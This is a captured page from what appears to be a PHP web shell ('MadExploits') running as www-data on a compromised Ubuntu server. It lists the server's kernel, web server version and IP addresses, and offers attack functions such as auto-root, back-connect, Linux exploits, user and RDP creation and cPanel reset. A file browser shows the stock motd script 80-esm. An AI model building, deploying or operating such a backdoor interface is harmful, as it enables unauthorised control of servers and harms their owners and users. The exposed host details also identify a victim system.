Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.15.3.240
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
update-motd.d /
[ HOME SHELL ]
Name
Size
Permission
Action
00-header
1.19
KB
-rwxr-xr-x
10-help-text
1.13
KB
-rwxr-xr-x
50-landscape-sysinfo
397
B
-rwxr-xr-x
50-motd-news
4.88
KB
-rwxr-xr-x
80-esm
604
B
-rwxr-xr-x
80-livepatch
2.95
KB
-rwxr-xr-x
90-updates-available
97
B
-rwxr-xr-x
91-release-upgrade
299
B
-rwxr-xr-x
92-unattended-upgrades
165
B
-rwxr-xr-x
95-hwe-eol
129
B
-rwxr-xr-x
97-overlayroot
111
B
-rwxr-xr-x
98-fsck-at-reboot
142
B
-rwxr-xr-x
98-reboot-required
144
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 80-esm
#!/bin/sh SERIES=$(lsb_release -cs) DESCRIPTION=$(lsb_release -ds) [ "$SERIES" = "precise" ] || exit 0 [ -x /usr/bin/ubuntu-advantage ] || exit 0 if ubuntu-advantage is-esm-enabled; then cat <<EOF This ${DESCRIPTION} system is configured to receive extended security updates from Canonical: * https://www.ubuntu.com/esm EOF else cat <<EOF This ${DESCRIPTION} system is past its End of Life, and is no longer receiving security updates. To protect the integrity of this system, it’s critical that you enable Extended Security Maintenance updates: * https://www.ubuntu.com/esm EOF fi echo
Close